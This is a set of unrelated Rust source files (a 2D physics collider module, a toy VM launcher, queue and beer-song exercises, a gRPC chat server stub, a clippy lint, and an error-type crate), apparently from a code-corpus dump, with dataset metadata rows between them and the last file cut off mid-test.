pub enum ColliderShape {
/// See [`BallShape`] docs.
Ball(BallShape),
/// See [`CuboidShape`] docs.
Cuboid(CuboidShape),
/// See [`CapsuleShape`] docs.
Capsule(CapsuleShape),
/// See [`SegmentShape`] docs.
Segment(SegmentShape),
/// See [`TriangleShape`] docs.
Triangle(TriangleShape),
/// See [`TrimeshShape`] docs.
Trimesh(TrimeshShape),
/// See [`HeightfieldShape`] docs.
Heightfield(HeightfieldShape),
}
impl Default for ColliderShape {
fn default() -> Self {
Self::Ball(Default::default())
}
}
impl ColliderShape {
/// Initializes a ball shape defined by its radius.
pub fn ball(radius: f32) -> Self {
Self::Ball(BallShape { radius })
}
/// Initializes a cuboid shape defined by its half-extents.
pub fn cuboid(hx: f32, hy: f32) -> Self {
Self::Cuboid(CuboidShape {
half_extents: Vector2::new(hx, hy),
})
}
/// Initializes a capsule shape from its endpoints and radius.
pub fn capsule(begin: Vector2<f32>, end: Vector2<f32>, radius: f32) -> Self {
Self::Capsule(CapsuleShape { begin, end, radius })
}
/// Initializes a new collider builder with a capsule shape aligned with the `x` axis.
pub fn capsule_x(half_height: f32, radius: f32) -> Self {
let p = Vector2::x() * half_height;
Self::capsule(-p, p, radius)
}
/// Initializes a new collider builder with a capsule shape aligned with the `y` axis.
pub fn capsule_y(half_height: f32, radius: f32) -> Self {
let p = Vector2::y() * half_height;
Self::capsule(-p, p, radius)
}
/// Initializes a segment shape from its endpoints.
pub fn segment(begin: Vector2<f32>, end: Vector2<f32>) -> Self {
Self::Segment(SegmentShape { begin, end })
}
/// Initializes a triangle shape.
pub fn triangle(a: Vector2<f32>, b: Vector2<f32>, c: Vector2<f32>) -> Self {
Self::Triangle(TriangleShape { a, b, c })
}
/// Initializes a triangle mesh shape defined by a set of handles to mesh nodes that will be
/// used to create physical shape.
pub fn trimesh(geometry_sources: Vec<GeometrySource>) -> Self {
Self::Trimesh(TrimeshShape {
sources: geometry_sources,
})
}
/// Initializes a heightfield shape defined by a handle to terrain node.
pub fn heightfield(geometry_source: GeometrySource) -> Self {
Self::Heightfield(HeightfieldShape { geometry_source })
}
}
/// Collider is a geometric entity that can be attached to a rigid body to allow participate it
/// participate in contact generation, collision response and proximity queries.
#[derive(Reflect, Visit, Debug)]
pub struct Collider {
base: Base,
#[reflect(setter = "set_shape")]
pub(crate) shape: InheritableVariable<ColliderShape>,
#[reflect(min_value = 0.0, step = 0.05, setter = "set_friction")]
pub(crate) friction: InheritableVariable<f32>,
#[reflect(setter = "set_density")]
pub(crate) density: InheritableVariable<Option<f32>>,
#[reflect(min_value = 0.0, step = 0.05, setter = "set_restitution")]
pub(crate) restitution: InheritableVariable<f32>,
#[reflect(setter = "set_is_sensor")]
pub(crate) is_sensor: InheritableVariable<bool>,
#[reflect(setter = "set_collision_groups")]
pub(crate) collision_groups: InheritableVariable<InteractionGroups>,
#[reflect(setter = "set_solver_groups")]
pub(crate) solver_groups: InheritableVariable<InteractionGroups>,
#[reflect(setter = "set_friction_combine_rule")]
pub(crate) friction_combine_rule: InheritableVariable<CoefficientCombineRule>,
#[reflect(setter = "set_restitution_combine_rule")]
pub(crate) restitution_combine_rule: InheritableVariable<CoefficientCombineRule>,
#[visit(skip)]
#[reflect(hidden)]
pub(crate) native: Cell<ColliderHandle>,
}
impl Default for Collider {
fn default() -> Self {
Self {
base: Default::default(),
shape: Default::default(),
friction: Default::default(),
density: Default::default(),
restitution: Default::default(),
is_sensor: Default::default(),
collision_groups: Default::default(),
solver_groups: Default::default(),
friction_combine_rule: Default::default(),
restitution_combine_rule: Default::default(),
native: Cell::new(ColliderHandle::invalid()),
}
}
}
impl Deref for Collider {
type Target = Base;
fn deref(&self) -> &Self::Target {
&self.base
}
}
impl DerefMut for Collider {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.base
}
}
impl Clone for Collider {
fn clone(&self) -> Self {
Self {
base: self.base.clone(),
shape: self.shape.clone(),
friction: self.friction.clone(),
density: self.density.clone(),
restitution: self.restitution.clone(),
is_sensor: self.is_sensor.clone(),
collision_groups: self.collision_groups.clone(),
solver_groups: self.solver_groups.clone(),
friction_combine_rule: self.friction_combine_rule.clone(),
restitution_combine_rule: self.restitution_combine_rule.clone(),
// Do not copy. The copy will have its own native representation.
native: Cell::new(ColliderHandle::invalid()),
}
}
}
impl TypeUuidProvider for Collider {
fn type_uuid() -> Uuid {
uuid!("2b1659ea-a116-4224-bcd4-7931e3ae3b40")
}
}
impl Collider {
/// Sets the new shape to the collider.
///
/// # Performance
///
/// This is relatively expensive operation - it forces the physics engine to recalculate contacts,
/// perform collision response, etc. Try avoid calling this method each frame for better
/// performance.
pub fn set_shape(&mut self, shape: ColliderShape) -> ColliderShape {
self.shape.set_value_and_mark_modified(shape)
}
/// Returns shared reference to the collider shape.
pub fn shape(&self) -> &ColliderShape {
&self.shape
}
/// Returns a copy of the collider shape.
pub fn shape_value(&self) -> ColliderShape {
(*self.shape).clone()
}
/// Returns mutable reference to the current collider shape.
///
/// # Performance
///
/// This is relatively expensive operation - it forces the physics engine to recalculate contacts,
/// perform collision response, etc. Try avoid calling this method each frame for better
/// performance.
pub fn shape_mut(&mut self) -> &mut ColliderShape {
self.shape.get_value_mut_and_mark_modified()
}
/// Sets the new restitution value. The exact meaning of possible values is somewhat complex,
/// check [Wikipedia page](https://en.wikipedia.org/wiki/Coefficient_of_restitution) for more
/// info.
///
/// # Performance
///
/// This is relatively expensive operation - it forces the physics engine to recalculate contacts,
/// perform collision response, etc. Try avoid calling this method each frame for better
/// performance.
pub fn set_restitution(&mut self, restitution: f32) -> f32 {
self.restitution.set_value_and_mark_modified(restitution)
}
/// Returns current restitution value of the collider.
pub fn restitution(&self) -> f32 {
*self.restitution
}
/// Sets the new density value of the collider. Density defines actual mass of the rigid body to
/// which the collider is attached. Final mass will be a sum of `ColliderVolume * ColliderDensity`
/// of each collider. In case if density is undefined, the mass of the collider will be zero,
/// which will lead to two possible effects:
///
/// 1) If a rigid body to which collider is attached have no additional mass, then the rigid body
/// won't rotate, only move.
/// 2) If the rigid body have some additional mass, then the rigid body will have normal behaviour.
///
/// # Performance
///
/// This is relatively expensive operation - it forces the physics engine to recalculate contacts,
/// perform collision response, etc. Try avoid calling this method each frame for better
/// performance.
pub fn set_density(&mut self, density: Option<f32>) -> Option<f32> {
self.density.set_value_and_mark_modified(density)
}
/// Returns current density of the collider.
pub fn density(&self) -> Option<f32> {
*self.density
}
/// Sets friction coefficient for the collider. The greater value is the more kinematic energy
/// will be converted to heat (in other words - lost), the parent rigid body will slowdown much
/// faster and so on.
///
/// # Performance
///
/// This is relatively expensive operation - it forces the physics engine to recalculate contacts,
/// perform collision response, etc. Try avoid calling this method each frame for better
/// performance.
pub fn set_friction(&mut self, friction: f32) -> f32 {
self.friction.set_value_and_mark_modified(friction)
}
/// Return current friction of the collider.
pub fn friction(&self) -> f32 {
*self.friction
}
/// Sets the new collision filtering options. See [`InteractionGroups`] docs for more info.
///
/// # Performance
///
/// This is relatively expensive operation - it forces the physics engine to recalculate contacts,
/// perform collision response, etc. Try avoid calling this method each frame for better
/// performance.
pub fn set_collision_groups(&mut self, groups: InteractionGroups) -> InteractionGroups {
self.collision_groups.set_value_and_mark_modified(groups)
}
/// Returns current collision filtering options.
pub fn collision_groups(&self) -> InteractionGroups {
*self.collision_groups
}
/// Sets the new joint solver filtering options. See [`InteractionGroups`] docs for more info.
///
/// # Performance
///
/// This is relatively expensive operation - it forces the physics engine to recalculate contacts,
/// perform collision response, etc. Try avoid calling this method each frame for better
/// performance.
pub fn set_solver_groups(&mut self, groups: InteractionGroups) -> InteractionGroups {
self.solver_groups.set_value_and_mark_modified(groups)
}
/// Returns current solver groups.
pub fn solver_groups(&self) -> InteractionGroups {
*self.solver_groups
}
/// If true is passed, the method makes collider a sensor. Sensors will not participate in
/// collision response, but it is still possible to query contact information from them.
///
/// # Performance
///
/// This is relatively expensive operation - it forces the physics engine to recalculate contacts,
/// perform collision response, etc. Try avoid calling this method each frame for better
/// performance.
pub fn set_is_sensor(&mut self, is_sensor: bool) -> bool {
self.is_sensor.set_value_and_mark_modified(is_sensor)
}
/// Returns true if the collider is sensor, false - otherwise.
pub fn is_sensor(&self) -> bool {
*self.is_sensor
}
/// Sets the new friction combine rule. See [`CoefficientCombineRule`] docs for more info.
///
/// # Performance
///
/// This is relatively expensive operation - it forces the physics engine to recalculate contacts,
/// perform collision response, etc. Try avoid calling this method each frame for better
/// performance.
pub fn set_friction_combine_rule(
&mut self,
rule: CoefficientCombineRule,
) -> CoefficientCombineRule {
self.friction_combine_rule.set_value_and_mark_modified(rule)
}
/// Returns current friction combine rule of the collider.
pub fn friction_combine_rule(&self) -> CoefficientCombineRule {
*self.friction_combine_rule
}
/// Sets the new restitution combine rule. See [`CoefficientCombineRule`] docs for more info.
///
/// # Performance
///
/// This is relatively expensive operation - it forces the physics engine to recalculate contacts,
/// perform collision response, etc. Try avoid calling this method each frame for better
/// performance.
pub fn set_restitution_combine_rule(
&mut self,
rule: CoefficientCombineRule,
) -> CoefficientCombineRule {
self.restitution_combine_rule
.set_value_and_mark_modified(rule)
}
/// Returns current restitution combine rule of the collider.
pub fn restitution_combine_rule(&self) -> CoefficientCombineRule {
*self.restitution_combine_rule
}
/// Returns an iterator that yields contact information for the collider.
/// Contacts checks between two regular colliders
pub fn contacts<'a>(
&self,
physics: &'a PhysicsWorld,
) -> impl Iterator<Item = ContactPair> + 'a {
physics.contacts_with(self.native.get())
}
/// Returns an iterator that yields intersection information for the collider.
/// Intersections checks between regular colliders and sensor colliders
pub fn intersects<'a>(
&self,
physics: &'a PhysicsWorld,
) -> impl Iterator<Item = IntersectionPair> + 'a {
physics.intersections_with(self.native.get())
}
pub(crate) fn needs_sync_model(&self) -> bool {
self.shape.need_sync()
|| self.friction.need_sync()
|| self.density.need_sync()
|| self.restitution.need_sync()
|| self.is_sensor.need_sync()
|| self.collision_groups.need_sync()
|| self.solver_groups.need_sync()
|| self.friction_combine_rule.need_sync()
|| self.restitution_combine_rule.need_sync()
}
}
impl NodeTrait for Collider {
crate::impl_query_component!();
fn local_bounding_box(&self) -> AxisAlignedBoundingBox {
self.base.local_bounding_box()
}
fn world_bounding_box(&self) -> AxisAlignedBoundingBox {
self.base.world_bounding_box()
}
fn id(&self) -> Uuid {
Self::type_uuid()
}
fn on_removed_from_graph(&mut self, graph: &mut Graph) {
graph.physics2d.remove_collider(self.native.get());
self.native.set(ColliderHandle::invalid());
Log::info(format!(
"Native collider 2D was removed for node: {}",
self.name()
));
}
fn sync_native(&self, self_handle: Handle<Node>, context: &mut SyncContext) {
context
.physics2d
.sync_to_collider_node(context.nodes, self_handle, self);
}
fn validate(&self, scene: &Scene) -> Result<(), String> {
if scene
.graph
.try_get(self.parent())
.and_then(|p| p.query_component_ref::<RigidBody>())
.is_none()
{
Err(
"2D Collider must be a direct child of a 3D Rigid Body node, \
otherwise it will not have any effect!"
.to_string(),
)
} else {
Ok(())
}
}
}
/// Collider builder allows you to build a collider node in declarative manner.
pub struct ColliderBuilder {
base_builder: BaseBuilder,
shape: ColliderShape,
friction: f32,
density: Option<f32>,
restitution: f32,
is_sensor: bool,
collision_groups: InteractionGroups,
solver_groups: InteractionGroups,
friction_combine_rule: CoefficientCombineRule,
restitution_combine_rule: CoefficientCombineRule,
}
impl ColliderBuilder {
/// Creates new collider builder.
pub fn new(base_builder: BaseBuilder) -> Self {
Self {
base_builder,
shape: Default::default(),
friction: 0.0,
density: None,
restitution: 0.0,
is_sensor: false,
collision_groups: Default::default(),
solver_groups: Default::default(),
friction_combine_rule: Default::default(),
restitution_combine_rule: Default::default(),
}
}
/// Sets desired shape of the collider.
pub fn with_shape(mut self, shape: ColliderShape) -> Self {
self.shape = shape;
self
}
/// Sets desired density value.
pub fn with_density(mut self, density: Option<f32>) -> Self {
self.density = density;
self
}
/// Sets desired restitution value.
pub fn with_restitution(mut self, restitution: f32) -> Self {
self.restitution = restitution;
self
}
/// Sets desired friction value.
pub fn with_friction(mut self, friction: f32) -> Self {
self.friction = friction;
self
}
/// Sets whether this collider will be used a sensor or not.
pub fn with_sensor(mut self, sensor: bool) -> Self {
self.is_sensor = sensor;
self
}
/// Sets desired solver groups.
pub fn with_solver_groups(mut self, solver_groups: InteractionGroups) -> Self {
self.solver_groups = solver_groups;
self
}
/// Sets desired collision groups.
pub fn with_collision_groups(mut self, collision_groups: InteractionGroups) -> Self {
self.collision_groups = collision_groups;
self
}
/// Sets desired friction combine rule.
pub fn with_friction_combine_rule(mut self, rule: CoefficientCombineRule) -> Self {
self.friction_combine_rule = rule;
self
}
/// Sets desired restitution combine rule.
pub fn with_restitution_combine_rule(mut self, rule: CoefficientCombineRule) -> Self {
self.restitution_combine_rule = rule;
self
}
/// Creates collider node, but does not add it to a graph.
pub fn build_collider(self) -> Collider {
Collider {
base: self.base_builder.build_base(),
shape: self.shape.into(),
friction: self.friction.into(),
density: self.density.into(),
restitution: self.restitution.into(),
is_sensor: self.is_sensor.into(),
collision_groups: self.collision_groups.into(),
solver_groups: self.solver_groups.into(),
friction_combine_rule: self.friction_combine_rule.into(),
restitution_combine_rule: self.restitution_combine_rule.into(),
native: Cell::new(ColliderHandle::invalid()),
}
}
/// Creates collider node, but does not add it to a graph.
pub fn build_node(self) -> Node {
Node::new(self.build_collider())
}
/// Creates collider node and adds it to the graph.
pub fn build(self, graph: &mut Graph) -> Handle<Node> {
graph.add_node(self.build_node())
}
}
#[cfg(test)]
mod test {
use crate::core::algebra::Vector2;
use crate::scene::{
base::BaseBuilder,
dim2::{
collider::{ColliderBuilder, ColliderShape},
rigidbody::RigidBodyBuilder,
},
graph::Graph,
rigidbody::RigidBodyType,
};
#[test]
fn test_collider_2d_intersect() {
let mut graph = Graph::new();
let mut create_rigid_body = |is_sensor| {
let cube_half_size = 0.5;
let collider_sensor = ColliderBuilder::new(BaseBuilder::new())
.with_shape(ColliderShape::cuboid(cube_half_size, cube_half_size))
.with_sensor(is_sensor)
.build(&mut graph);
RigidBodyBuilder::new(BaseBuilder::new().with_children(&[collider_sensor]))
.with_body_type(RigidBodyType::Static)
.build(&mut graph);
collider_sensor
};
let collider_sensor = create_rigid_body(true);
let collider_non_sensor = create_rigid_body(false);
// need to call two times for the physics engine to execute
graph.update(Vector2::new(800.0, 600.0), 1.0, Default::default());
graph.update(Vector2::new(800.0, 600.0), 1.0, Default::default());
// we don't expect contact between regular body and sensor
assert_eq!(
0,
graph[collider_sensor]
.as_collider2d()
.contacts(&graph.physics2d)
.count()
);
assert_eq!(
0,
graph[collider_non_sensor]
.as_collider2d()
.contacts(&graph.physics2d)
.count()
);
// we expect intersection between regular body and sensor
assert_eq!(
1,
graph[collider_sensor]
.as_collider2d()
.intersects(&graph.physics2d)
.count()
);
assert_eq!(
1,
graph[collider_non_sensor]
.as_collider2d()
.intersects(&graph.physics2d)
.count()
);
}
}
| true |
e8786bcf7489264861ba48adea032498397352c3
|
Rust
|
emmgame221/teenyat
|
/src/main.rs
|
UTF-8
| 1,476 | 2.96875 | 3 |
[
"MIT"
] |
permissive
|
mod arch;
mod assembler;
mod vm;
use std::env;
fn main() {
let mut args = env::args();
if args.len() >= 2 {
args.next();
let path = args.next().unwrap();
let mut debug_mode = false;
if let Some(s) = args.next() {
debug_mode = s == "-d";
if s == "-a" {
assemble(path).unwrap();
return;
}
}
run(path, debug_mode).unwrap();
} else {
let path = console_input();
run(path, false).unwrap();
}
}
fn assemble(path: String) -> std::io::Result<()> {
let mem = assembler::parse_file(&path)?;
let out_path = path.replace(".tat", ".rom");
mem.save_program(&out_path)?;
mem.print_program();
Ok(())
}
fn console_input() -> String {
println!("Enter the name of the file to run: ");
let mut buf = String::new();
std::io::stdin().read_line(&mut buf).unwrap();
buf
}
fn run(path: String, debug_mode: bool) -> std::io::Result<()> {
let program = if path.ends_with(".tat") {
assembler::parse_file(&path)?
} else if path.ends_with(".rom") {
arch::Memory::from_rom_file(&path)?
} else {
return Err(std::io::Error::new(
std::io::ErrorKind::InvalidInput,
"Input file must be either an assembly file (.tat) or a rom file (.rom)",
));
};
let mut vm = vm::TeenyAT::new(program);
vm.debug_mode = debug_mode;
vm.run()?;
Ok(())
}
| true |
7f71ca2c15f6efb858c5a02ddfb0e9bbebfbb9b0
|
Rust
|
savish/queues
|
/examples/buf.rs
|
UTF-8
| 1,879 | 3.203125 | 3 |
[
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"Apache-2.0"
] |
permissive
|
extern crate queues;
use queues::{Buffer, IsQueue};
fn main() {
println!("\nBuffer - typical usage");
println!("--");
println!("\nCreate a new empty buffer:");
println!("let mut buf: Buffer<isize> = Buffer::new(3);");
let mut buf: Buffer<isize> = Buffer::new(3);
println!("\nAdd elements to it:");
println!("buf.add(1);");
println!("> {:?}", buf.add(1));
println!("buf.add(-2);");
println!("> {:?}", buf.add(-2));
println!("buf.add(3);");
println!("> {:?}", buf.add(3));
println!("\nAttempt to add elements when full:");
println!("buf.add(-4); // Should raise an error");
println!("> {:?}", buf.add(-4));
println!("\nCheck the buffer's size:");
println!("buf.size(); // Should be 3");
println!("> {}", buf.size());
println!("\nRemove elements from it:");
println!("buf.remove(); // Should be Ok(1)");
println!("> {:?}", buf.remove());
println!("\nCheck the buffer's size:");
println!("buf.size(); // Should be 2");
println!("> {}", buf.size());
println!("\nPeek at the next element to be removed:");
println!("buf.peek(); // Should be Ok(-2)");
println!("> {:?}", buf.peek());
println!("\nCheck the queue's size:");
println!("buf.size(); // Should be 2");
println!("> {}", buf.size());
println!("\nRemove more elements from it:");
println!("buf.remove(); // Should be Ok(-2)");
println!("> {:?}", buf.remove());
println!("buf.remove(); // Should be Ok(3)");
println!("> {:?}", buf.remove());
println!("\nPeek at the next element to be removed:");
println!("buf.peek(); // Should raise an error");
println!("> {:?}", buf.peek());
println!("\nAttempt to remove elements from it:");
println!("buf.remove(); // Should raise an error");
println!("> {:?}", buf.remove());
println!("\n--\n")
}
| true |
bcba4b201eeec09afcf7df490c425292e2b8023c
|
Rust
|
Aaron1011/clippy_bug
|
/src/main.rs
|
UTF-8
| 219 | 3.15625 | 3 |
[] |
no_license
|
fn main() {
let mut a = true;
loop {
while a {
if true {
a = false;
continue;
}
return;
}
println!("Looping");
}
}
| true |
75ed83cca0c75153a3057dcc1ecbd03c7efd5e64
|
Rust
|
daveduthie/exercism.io-exercises
|
/rust/beer-song/src/lib.rs
|
UTF-8
| 1,188 | 3.5 | 4 |
[] |
no_license
|
fn unit(num: u32, capitalise: bool) -> String {
match num {
0 if capitalise => "No more bottles".to_string(),
0 => "no more bottles".to_string(),
1 => "1 bottle".to_string(),
_ => num.to_string() + " bottles",
}
}
fn determiner(num: u32) -> String {
match num {
1 => "it".to_string(),
_ => "one".to_string(),
}
}
pub fn verse(num: u32) -> String {
let prefix = format!("{} of beer on the wall, \
{} of beer.\n",
unit(num, true),
unit(num, false));
let suffix = match num {
0 => {
"Go to the store and buy some more, \
99 bottles of beer on the wall.\n"
.to_string()
}
_ => {
format!("Take {} down and pass it around, \
{} of beer on the wall.\n",
determiner(num),
unit(num - 1, false))
}
};
prefix + &suffix
}
pub fn sing(high: u32, low: u32) -> String {
(low..(high + 1))
.rev()
.map(|x| verse(x))
.collect::<Vec<String>>()
.join("\n")
}
| true |
3dbb4742b486b35f1477643525b807af2c885a57
|
Rust
|
maccoda/cross-communication
|
/server/src/bin/basic_server_example.rs
|
UTF-8
| 4,166 | 2.59375 | 3 |
[
"MIT"
] |
permissive
|
extern crate chat_server;
extern crate grpc;
extern crate futures;
extern crate futures_cpupool;
extern crate protobuf;
use std::thread;
use futures_cpupool::CpuPool;
use grpc::{SingleResponse, StreamingResponse, StreamingRequest};
use chat_server::message_grpc::*;
use chat_server::message::*;
/// Type for the *rooms* that the server uses.
#[derive(PartialEq)]
struct MsgRoom(Room);
impl MsgRoom {
fn name(&self) -> &str {
self.0.get_name()
}
fn from(name: &str) -> MsgRoom {
let mut room = Room::new();
room.set_name(name.to_owned());
MsgRoom(room)
}
}
struct CommunicatorImpl {
// NOTE This is just the basic implementation, a map or some sorted structure may be better
// NOTE Would also need to have access to the database of conversation history
conversations: Vec<MsgRoom>,
}
impl CommunicatorImpl {
fn new() -> CommunicatorImpl {
CommunicatorImpl { conversations: vec![MsgRoom::from("cross_comm")] }
}
}
impl Communicator for CommunicatorImpl {
fn initiate_conversation(&self,
options: ::grpc::RequestOptions,
req: InitiateRequest)
-> SingleResponse<InitiateReply> {
let mut reply = InitiateReply::new();
println!("Received an initiate command from {:?}",
req.get_clientAddress());
println!("They wish to connect with {:?}", req.get_room());
let matches: Vec<&MsgRoom> = self.conversations
.iter()
.filter(|x| x.name() == req.get_room().get_name())
.collect();
if matches.len() != 1 {
SingleResponse::err(grpc::error::Error::Other("Room unavailable to open"))
} else {
reply.set_success(true);
SingleResponse::completed(reply)
}
}
fn terminate_conversation(&self,
options: ::grpc::RequestOptions,
req: TerminateRequest)
-> SingleResponse<TerminateReply> {
let mut reply = TerminateReply::new();
println!("Received a terminate command from {:?}",
req.get_clientAddress());
let req_id = req.get_room();
println!("They wish to end their conversation with {:?}", req_id);
// First check that the conversation can be ended
let matches: Vec<&MsgRoom> = self.conversations
.iter()
.filter(|x| x.name() == req.get_room().get_name())
.collect();
if matches.len() != 1 {
SingleResponse::err(grpc::error::Error::Other("Conversation not yet open. Incorrect \
conversation ID"))
} else {
// matches[0].clear();
reply.set_success(true);
SingleResponse::completed(reply)
}
}
fn send_message(&self,
options: ::grpc::RequestOptions,
reqs: StreamingRequest<MessageRequest>)
-> StreamingResponse<MessageReply> {
// FIXME Unsure of how to make mock of the iterator
let mut msgs = vec![];
for i in 0..10 {
let mut reply = Message::new();
reply.set_content(format!("Message {}", i));
reply.set_user(make_address());
msgs.push(reply);
}
let mut reply = MessageReply::new();
reply.set_messages(::protobuf::RepeatedField::from_vec(msgs));
StreamingResponse::completed(vec![reply])
}
}
fn make_address() -> Address {
let mut addr = Address::new();
addr.set_address("remote".to_owned());
addr
}
#[allow(unused_variables)]
fn main() {
// Create the server, need unused variable so doesn't get disposed of
let server = CommunicatorServer::new_pool("[::]:50051",
Default::default(),
CommunicatorImpl::new(),
CpuPool::new(4));
println!("Server started");
loop {
thread::park();
}
}
| true |
04e2cc5f75c84cbea4e80139411a0364c57a45a9
|
Rust
|
INTENDRO/learning_rust
|
/loops/src/main.rs
|
UTF-8
| 1,128 | 3.984375 | 4 |
[] |
no_license
|
// fn main() {
// loop{
// println!("again!");
// }
// }
// fn main() {
// let mut counter = 0;
// let result = loop {
// counter += 1;
// if counter == 10 {
// break counter * 2;
// }
// };
// println!("result = {}", result);
// }
// fn main() {
// let mut number = 3;
// while number != 0 {
// println!("{}", number);
// number -= 1;
// }
// println!("LIFTOFF!!");
// }
// fn main() {
// let arr = [10,20,30,40,50];
// let mut ind = 0;
// println!("interating over array using while-loop");
// while ind < 5 {
// println!("{}", arr[ind]);
// ind += 1;
// }
// println!("done");
// }
// fn main() {
// let arr = [10,20,30,40,50];
// println!("interating over array using for-loop");
// for element in arr.iter() {
// println!("{}", element);
// }
// println!("done");
// }
fn main() {
println!("interating using for-loop and range");
for number in (1..4).rev() {
println!("{}", number);
}
println!("LIFTOFF!!");
}
| true |
695c8e8c028256d1355f930379afdb6fbd9d1481
|
Rust
|
rust-lang/rust
|
/src/tools/clippy/clippy_lints/src/from_raw_with_void_ptr.rs
|
UTF-8
| 3,158 | 2.90625 | 3 |
[
"Apache-2.0",
"MIT",
"LLVM-exception",
"NCSA",
"BSD-2-Clause",
"LicenseRef-scancode-unicode",
"LicenseRef-scancode-other-permissive"
] |
permissive
|
use clippy_utils::diagnostics::span_lint_and_help;
use clippy_utils::ty::is_c_void;
use clippy_utils::{match_def_path, path_def_id, paths};
use rustc_hir::def_id::DefId;
use rustc_hir::{Expr, ExprKind, QPath};
use rustc_lint::{LateContext, LateLintPass};
use rustc_middle::ty::{RawPtr, TypeAndMut};
use rustc_session::{declare_lint_pass, declare_tool_lint};
use rustc_span::sym;
declare_clippy_lint! {
/// ### What it does
/// Checks if we're passing a `c_void` raw pointer to `{Box,Rc,Arc,Weak}::from_raw(_)`
///
/// ### Why is this bad?
/// When dealing with `c_void` raw pointers in FFI, it is easy to run into the pitfall of calling `from_raw` with the `c_void` pointer.
/// The type signature of `Box::from_raw` is `fn from_raw(raw: *mut T) -> Box<T>`, so if you pass a `*mut c_void` you will get a `Box<c_void>` (and similarly for `Rc`, `Arc` and `Weak`).
/// For this to be safe, `c_void` would need to have the same memory layout as the original type, which is often not the case.
///
/// ### Example
/// ```rust
/// # use std::ffi::c_void;
/// let ptr = Box::into_raw(Box::new(42usize)) as *mut c_void;
/// let _ = unsafe { Box::from_raw(ptr) };
/// ```
/// Use instead:
/// ```rust
/// # use std::ffi::c_void;
/// # let ptr = Box::into_raw(Box::new(42usize)) as *mut c_void;
/// let _ = unsafe { Box::from_raw(ptr as *mut usize) };
/// ```
///
#[clippy::version = "1.67.0"]
pub FROM_RAW_WITH_VOID_PTR,
suspicious,
"creating a `Box` from a void raw pointer"
}
declare_lint_pass!(FromRawWithVoidPtr => [FROM_RAW_WITH_VOID_PTR]);
impl LateLintPass<'_> for FromRawWithVoidPtr {
fn check_expr(&mut self, cx: &LateContext<'_>, expr: &Expr<'_>) {
if let ExprKind::Call(box_from_raw, [arg]) = expr.kind
&& let ExprKind::Path(QPath::TypeRelative(ty, seg)) = box_from_raw.kind
&& seg.ident.name == sym!(from_raw)
&& let Some(type_str) = path_def_id(cx, ty).and_then(|id| def_id_matches_type(cx, id))
&& let arg_kind = cx.typeck_results().expr_ty(arg).kind()
&& let RawPtr(TypeAndMut { ty, .. }) = arg_kind
&& is_c_void(cx, *ty) {
let msg = format!("creating a `{type_str}` from a void raw pointer");
span_lint_and_help(cx, FROM_RAW_WITH_VOID_PTR, expr.span, &msg, Some(arg.span), "cast this to a pointer of the appropriate type");
}
}
}
/// Checks whether a `DefId` matches `Box`, `Rc`, `Arc`, or one of the `Weak` types.
/// Returns a static string slice with the name of the type, if one was found.
fn def_id_matches_type(cx: &LateContext<'_>, def_id: DefId) -> Option<&'static str> {
// Box
if Some(def_id) == cx.tcx.lang_items().owned_box() {
return Some("Box");
}
if let Some(symbol) = cx.tcx.get_diagnostic_name(def_id) {
if symbol == sym::Arc {
return Some("Arc");
} else if symbol == sym::Rc {
return Some("Rc");
}
}
if match_def_path(cx, def_id, &paths::WEAK_RC) || match_def_path(cx, def_id, &paths::WEAK_ARC) {
Some("Weak")
} else {
None
}
}
| true |
62856fafc93a8c2cc35045f6c04af72381b8082d
|
Rust
|
l1h3r/kraken-rs
|
/src/client/path.rs
|
UTF-8
| 659 | 3.421875 | 3 |
[] |
no_license
|
#[derive(Clone, Debug)]
#[repr(transparent)]
pub struct Path(String);
impl Path {
#[inline(always)]
pub fn new(path: &str) -> Self {
Self(path.to_string())
}
#[inline(always)]
pub fn as_str(&self) -> &str {
&self.0
}
pub fn add<K: AsRef<str>, V: AsRef<str>>(&mut self, key: K, value: V) {
if self.0.contains('?') {
self.0.push('&');
} else {
self.0.push('?');
}
self.0.push_str(key.as_ref());
self.0.push('=');
self.0.push_str(value.as_ref());
}
pub fn add_slice<K: AsRef<str>>(&mut self, key: K, slice: &[&str]) {
if !slice.is_empty() {
self.add(key, slice.join(","));
}
}
}
| true |
db8eb26f3f9ea04768e715726bb3274e039e1426
|
Rust
|
p-avital/any-error
|
/src/lib.rs
|
UTF-8
| 3,442 | 3.65625 | 4 |
[] |
no_license
|
#![feature(optin_builtin_traits)]
use core::any::Any;
/// A convenient 0-sized Error type that implements From<Type> and Into<Type: Default>.
/// Useful for when you only really care that "some error happened, and I want to use `?` to handle it"
#[derive(Copy, Clone, Debug, Eq, PartialEq)]
pub struct SomeError;
pub auto trait NotSomeError {}
impl !NotSomeError for SomeError {}
impl Default for SomeError {
fn default() -> Self {
SomeError
}
}
impl<T: NotSomeError> From<T> for SomeError {
fn from(_: T) -> SomeError {
SomeError
}
}
/// An error that implements From<Type: Debug>
/// Useful for when you still want to keep some error messages, but really want to use `?`
#[derive(Clone, Debug, Eq, PartialEq)]
pub struct FormattedError(pub String);
pub auto trait NotFormattedError {}
impl !NotFormattedError for FormattedError {}
impl FormattedError {
pub fn new(string: &str) -> Self {
FormattedError(string.to_owned())
}
}
impl Default for FormattedError {
fn default() -> Self {
FormattedError::new("Default FormattedError")
}
}
impl<T: core::fmt::Debug + NotFormattedError> From<T> for FormattedError {
fn from(t: T) -> FormattedError {
FormattedError(format!("{:?}", t))
}
}
/// When you may want to return various error types,
/// but are too lazy to use an enum and implement From for Everything.
pub struct AnyError(pub Box<dyn Any>);
pub auto trait NotAnyError {}
impl !NotAnyError for AnyError {}
impl Default for AnyError {
fn default() -> Self {
().into()
}
}
impl<T: NotAnyError + Any> From<T> for AnyError {
fn from(t: T) -> AnyError {
AnyError(Box::new(t) as Box<dyn Any>)
}
}
impl AnyError {
pub fn downcast<T: Any>(self) -> Result<T, Self> {
match self.0.downcast::<T>() {
Ok(t) => Ok(*t),
Err(e) => Err(AnyError(e)),
}
}
}
#[cfg(test)]
mod test {
use crate::{AnyError, FormattedError, SomeError};
struct FormatableError;
impl core::fmt::Debug for FormatableError {
fn fmt(&self, f: &mut std::fmt::Formatter) -> Result<(), std::fmt::Error> {
write!(f, "FormatableErrorDebug")
}
}
fn unit_or_formatable_error(ok: bool) -> Result<(), FormatableError> {
match ok {
true => Ok(()),
false => Err(FormatableError),
}
}
#[test]
fn some_test() {
let test = |ok| -> Result<(), SomeError> { Ok(unit_or_formatable_error(ok)?) };
assert_eq!(test(true), Ok(()));
assert_eq!(test(false), Err(SomeError));
}
#[test]
fn formatted_test() {
